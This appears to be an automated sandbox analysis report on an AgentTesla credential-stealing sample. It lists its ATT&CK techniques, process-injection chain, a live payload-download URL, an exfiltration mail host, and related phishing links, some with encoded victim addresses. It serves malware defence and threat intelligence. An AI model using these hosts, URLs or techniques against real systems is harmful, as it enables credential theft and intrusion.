                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: Yara matchFile source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7348, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7348, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                Valid Accounts121
                Windows Management Instrumentation                		Path Interception1
                Access Token Manipulation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		3
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                System Shutdown/Reboot                		Acquire InfrastructureGather Victim Identity Information
                Default Accounts11
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts211
                Process Injection                		1
                Obfuscated Files or Information                		21
                Input Capture                		26
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth11
                Encrypted Channel                		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                Domain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Software Packing                		1
                Credentials in Registry                		121
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration2
                Non-Application Layer Protocol                		Data Encrypted for ImpactDNS ServerEmail Addresses
                Local AccountsCronLogin HookLogin Hook1
                Masquerading                		NTDS1
                Process Discovery                		Distributed Component Object Model21
                Input Capture                		Traffic Duplication13
                Application Layer Protocol                		Data DestructionVirtual Private ServerEmployee Names
                Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                Virtualization/Sandbox Evasion                		LSA Secrets141
                Virtualization/Sandbox Evasion                		SSH2
                Clipboard Data                		Scheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
                Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Access Token Manipulation                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                External Remote ServicesSystemd TimersStartup ItemsStartup Items211
                Process Injection                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1380074 Sample: PO_00290292.exe Startdate: 24/01/2024 Architecture: WINDOWS Score: 100 33 mail.qualityaf.com 2->33 35 api4.ipify.org 2->35 37 api.ipify.org 2->37 49 Found malware configuration 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 5 other signatures 2->55 9 PO_00290292.exe 8 33 2->9         started        signatures3 process4 file5 25 C:\Users\user\AppData\...\sarawakese.dri, data 9->25 dropped 27 C:\Users\user\AppData\Local\...\Lection.Fle, ASCII 9->27 dropped 29 C:\Users\user\AppData\Local\...\nse6573.tmp, data 9->29 dropped 31 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 9->31 dropped 65 Suspicious powershell command line found 9->65 13 powershell.exe 12 9->13         started        signatures6 process7 signatures8 67 Suspicious powershell command line found 13->67 69 Very long command line found 13->69 71 Found suspicious powershell code related to unpacking or dynamic code loading 13->71 16 powershell.exe 15 13->16         started        19 conhost.exe 13->19         started        process9 signatures10 45 Writes to foreign memory regions 16->45 47 Maps a DLL or memory area into another process 16->47 21 MSBuild.exe 15 9 16->21         started        process11 dnsIp12 39 mail.qualityaf.com 192.185.148.49, 49710, 49711, 49713 UNIFIEDLAYER-AS-1US United States 21->39 41 api4.ipify.org 104.237.62.211, 443, 49709 WEBNXUS United States 21->41 43 172.96.14.41, 49708, 80 UNREAL-SERVERSUS Canada 21->43 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->57 59 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->59 61 Tries to steal Mail credentials (via file / registry access) 21->61 63 3 other signatures 21->63 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO_00290292.exe5%ReversingLabs
                PO_00290292.exe16%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll1%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                mail.qualityaf.com0%VirustotalBrowse
                fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                http://crl.microsoft0%URL Reputationsafe
                http://crl.microsoft0%URL Reputationsafe
                http://x1.c.lencr.org/00%URL Reputationsafe
                http://x1.i.lencr.org/00%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://r3.o.lencr.org00%URL Reputationsafe
                http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                http://172.96.14.41/mfMeuTZ127.bin&0%Avira URL Cloudsafe
                http://172.96.14.41/mfMeuTZ127.bin0%Avira URL Cloudsafe
                http://mail.qualityaf.com0%Avira URL Cloudsafe
                http://www.microsoft.coB0%Avira URL Cloudsafe
                http://r3.i.lencr.org/0)0%Avira URL Cloudsafe
                http://172.96.14.41/mfMeuTZ127.bin3%VirustotalBrowse
                http://r3.i.lencr.org/0)0%VirustotalBrowse
                http://mail.qualityaf.com0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api4.ipify.org
                		104.237.62.211
                		truefalse
                  		high
                  mail.qualityaf.com
                  		192.185.148.49
                  		truetrueunknown
                  fp2e7a.wpc.phicdn.net
                  		192.229.211.108
                  		truefalseunknown
                  api.ipify.org
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high
                      http://172.96.14.41/mfMeuTZ127.binfalse
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://api.ipify.orgMSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://172.96.14.41/mfMeuTZ127.bin&MSBuild.exe, 00000005.00000002.2591135790.0000000004322000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          • URL Reputation: malware
                          		unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.microsoftpowershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://x1.c.lencr.org/0MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://x1.i.lencr.org/0MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://mail.qualityaf.comMSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.000000002019C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://r3.o.lencr.org0MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://nsis.sf.net/NSIS_ErrorErrorPO_00290292.exefalse
                                  		high
                                  https://api.ipify.org/tMSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://r3.i.lencr.org/0)MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.microsoft.coBpowershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://cps.root-x1.letsencrypt.org0MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        192.185.148.49
                                        		mail.qualityaf.comUnited States
                                        		46606UNIFIEDLAYER-AS-1UStrue
                                        104.237.62.211
                                        		api4.ipify.orgUnited States
                                        		18450WEBNXUSfalse
                                        172.96.14.41
                                        		unknownCanada
                                        		64236UNREAL-SERVERSUSfalse

                                        General Information

                                        Joe Sandbox version:39.0.0 Ruby
                                        Analysis ID:1380074
                                        Start date and time:2024-01-24 09:01:29 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 1s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:PO_00290292.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.spyw.evad.winEXE@8/15@2/3
                                        EGA Information:
                                        • Successful, ratio: 50%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 226
                                        • Number of non-executed functions: 26
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 40.127.169.103, 192.229.211.108, 20.3.187.198, 20.242.39.171
                                        • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 6060 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        09:02:18API Interceptor132x Sleep call for process: powershell.exe modified
                                        09:02:39API Interceptor1199988x Sleep call for process: MSBuild.exe modified
                                        09:02:54API Interceptor4x Sleep call for process: PO_00290292.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        192.185.148.49RFQ_002902999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          order_confirm_PDF.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            104.237.62.2111.wsfGet hashmaliciousAsyncRAT, StormKitty, zgRATBrowse
                                            • api.ipify.org/
                                            1.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                            • api.ipify.org/
                                            vkspGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            mallox.bin.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                            • api.ipify.org/
                                            f18itb3RpL.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            Nemty.exeGet hashmaliciousNemtyBrowse
                                            • api.ipify.org/
                                            b9.exeGet hashmaliciousTyphon StealerBrowse
                                            • api.ipify.org/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            fp2e7a.wpc.phicdn.nethttps://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//sophielanda.com.au%2Fimag3in%2Fkindlue%2F3xf35o/bGluZWFtYWRyaWRAbWFkcmlkLmVzGet hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            JOpPQBoz65.exeGet hashmaliciousLummaC, zgRATBrowse
                                            • 192.229.211.108
                                            https://mobilemodula.com/Mbryan@example.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://perspectivefunnel.co/65af3e96eabac400142170f9/65afc3e15eaba70014d7303bGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://dejamom.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://stamentofinfo.us-lax-1.linodeobjects.com/payoutinfo.html#frank.user@fbi.gov.auGet hashmaliciousHTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://www.myfamilycare.co.uk/newsletter_tracker/?tokenKey=10adbd906d9961745bdf02ef2de644d5&campaignName=wfs-update-wy-02-apr-2020&lnk=href&url=HTTP%3a%2f%2fdpQYAdpQYA%2edpQYAdpQYA%2einnovigic%2ein%2f%2FYWJ1c2VAaW5vdmFsb24uY29t%3fabuse@inovalon.comGet hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            https://perspectivefunnel.co/65af3e96eabac400142170f9/65afc3e15eaba70014d7303b/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://link.mail.beehiiv.com/ls/click?upn=U3KC0-2BN7NjTBPeCl-2F9sZ8KjKNd8ZYWHPWq7ahxdo-2BE9dU10I-2FxfUbt5KMn9H05Dl-2BoU088pd9g1sncmN8DhaTQF2CfO87j-2BvLkjS73jMKGMnV2vpNgifKh1urCEdMf-2B7g8oiqw24CwkjtggvCaQSwjpqB01qOPh1w5buwykvzdY-3D23Pn_Pq3I9Eh0D9rhg7rSp11fzgH0J5A0HEAWnXS0zelxr-2BjIa8v7jfhBQAp813yLZDZqIlGIE-2Fg9dECDv0OREVLFJs9YNSF80RAVs4jCfFGdCSnH8guXKQvcBK1yAQawZj2pMkxppYyLG7LGlAv8sEcstVYJJrJgyLDWmM-2F73wbCuAbEo7jSY6-2BsaNZfFyriEw5CNeskZ85GxnpFGUHgRrMXdNRgVOdw0dvhBQUxZQDMrSidKaSTb5W4yFZH7TRw1PK44EbyWpuaEecZ7IpwMPHzf8jTUbq04ui0-2B0cZheMFxocxD6NMYRN90SFBBAsy-2F0ypshz4IsaBAlxI76U7MmweXsUXaoHVJf3wIyfZKHNXWKsqJH0KJlJu1cFOLH-2FGPLm-2BtcQeXAu91o2qP-2BoqsR83dYlCIrZEmUjh9x7J1o-2B8hzgsB-2FcD1xocOJF-2FMqOJceIFBOs-2BK-2BTiC1PyAgm8Nmt7Ag-3D-3D#ZGpva28uZG9icmljQGNlbnRyYWxpYW4uY29tLmF1Get hashmaliciousHTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://agenciacrl.com/it_wATd-l2g31icga/int_logonbuGidk/Get hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            api4.ipify.orgMACHINE_QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                            • 64.185.227.156
                                            Proforma_Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 64.185.227.156
                                            SecuriteInfo.com.Win32.PWSX-gen.1352.2615.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            SecuriteInfo.com.Win32.PWSX-gen.15348.28328.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            SecuriteInfo.com.Win32.PWSX-gen.21844.9999.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            3B18P2HItV.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 64.185.227.156
                                            SecuriteInfo.com.Win32.PWSX-gen.17929.17557.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Trojan.Packed2.46177.25997.17888.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5Get hashmaliciousHTMLPhisherBrowse
                                            • 64.185.227.156
                                            PO#_231001759.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            mail.qualityaf.comRFQ_002902999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 192.185.148.49
                                            order_confirm_PDF.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 192.185.148.49

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            UNREAL-SERVERSUSPayment Advice Copy_ BSP Fiji_pdf.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 172.96.14.67
                                            Rfq00888778.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 212.162.149.96
                                            RFQ_002902999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 212.162.149.96
                                            Hospital_Inquiry_List_3892892921.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 212.162.149.96
                                            Order_N#U00b0_202200027.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 212.162.149.96
                                            RFQ_0098W662L9.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 185.202.173.178
                                            maalesteder.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 185.202.175.170
                                            Postsigner.exeGet hashmaliciousGuLoaderBrowse
                                            • 185.202.175.201
                                            SPEC0376353400000256.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 185.202.175.201
                                            [DURAE]_INQUIRY_20230010.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 172.96.14.18
                                            UNIFIEDLAYER-AS-1USMACHINE_QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.254.225.136
                                            https://stamentofinfo.us-lax-1.linodeobjects.com/payoutinfo.html#frank.user@fbi.gov.auGet hashmaliciousHTMLPhisherBrowse
                                            • 192.185.146.109
                                            https://www.myfamilycare.co.uk/newsletter_tracker/?tokenKey=10adbd906d9961745bdf02ef2de644d5&campaignName=wfs-update-wy-02-apr-2020&lnk=href&url=HTTP%3a%2f%2fdpQYAdpQYA%2edpQYAdpQYA%2einnovigic%2ein%2f%2FYWJ1c2VAaW5vdmFsb24uY29t%3fabuse@inovalon.comGet hashmaliciousUnknownBrowse
                                            • 162.144.105.201
                                            https://www.my-link.com.au/mtcgi/tracklink3.php?x=D0304A3F.05AAE513&href=//executivamallet.com/me/cv/Acegutters/cGx1bWJpbmcuc2FsZXNAYWNlZ3V0dGVycy5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                            • 108.179.253.169
                                            https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//gigglingflamingo.com/fresh/bott/asdf/bjparish@steinborn.comGet hashmaliciousHTMLPhisherBrowse
                                            • 162.241.120.242
                                            FatRE012024.msiGet hashmaliciousUnknownBrowse
                                            • 192.185.215.152
                                            https://stats.sender.net/link_click/Nu71TBYERW_LOtYH/b926d7d2b5b7eeed918c842713ab9677#c2FyYWgucmF5bm9yQG93ZW5zLW1pbm9yLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                            • 108.179.252.92
                                            https://stats.sender.net/link_click/NuoFnYd1dw_LMgXF/a688273cd4a393802dbf8a14d5e1a550#cm9iaW5zb252QGFpcmJvcm4uY29tGet hashmaliciousHTMLPhisherBrowse
                                            • 69.49.245.172
                                            https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5Get hashmaliciousHTMLPhisherBrowse
                                            • 69.49.230.198
                                            http://www.alserhgroup.com/Get hashmaliciousUnknownBrowse
                                            • 192.185.48.207
                                            WEBNXUSMACHINE_QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                            • 64.185.227.156
                                            Proforma_Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 64.185.227.156
                                            SecuriteInfo.com.Win32.PWSX-gen.1352.2615.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            SecuriteInfo.com.Win32.PWSX-gen.15348.28328.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            SecuriteInfo.com.Win32.PWSX-gen.21844.9999.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            3B18P2HItV.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 64.185.227.156
                                            SecuriteInfo.com.Win32.PWSX-gen.17929.17557.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Trojan.Packed2.46177.25997.17888.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.231.16.75
                                            http://www.corporateworldwidetransportation.com/Get hashmaliciousUnknownBrowse
                                            • 64.185.227.155
                                            https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5Get hashmaliciousHTMLPhisherBrowse
                                            • 64.185.227.156

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            1138de370e523e824bbca92d049a3777https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//sophielanda.com.au%2Fimag3in%2Fkindlue%2F3xf35o/bGluZWFtYWRyaWRAbWFkcmlkLmVzGet hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            JOpPQBoz65.exeGet hashmaliciousLummaC, zgRATBrowse
                                            • 23.206.229.226
                                            https://perspectivefunnel.co/65af3e96eabac400142170f9/65afc3e15eaba70014d7303bGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 23.206.229.226
                                            http://185.81.157.104:222/PtZrTZD0WXqkQdXp.txtGet hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            https://drive.usercontent.google.com/download?id=1oHdUaAoRB_AkM6t_F5NEiKwf7wWZkAjY&export=downloadGet hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            https://qjkwdvhujdqw.weeblysite.com/Get hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            https://main.d2eo0cxrw88mo4.amplifyapp.com/windesk/00Windinside0actlatest/index.htmlGet hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            http://telegrnne.work/Get hashmaliciousTelegram PhisherBrowse
                                            • 23.206.229.226
                                            https://a.83-229-5-136.cprapid.com/Get hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            https://interlab.com.sg/66/-/billing.phpGet hashmaliciousUnknownBrowse
                                            • 23.206.229.226
                                            3b5074b1b5d032e5620f69f9f700ff0eMACHINE_QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
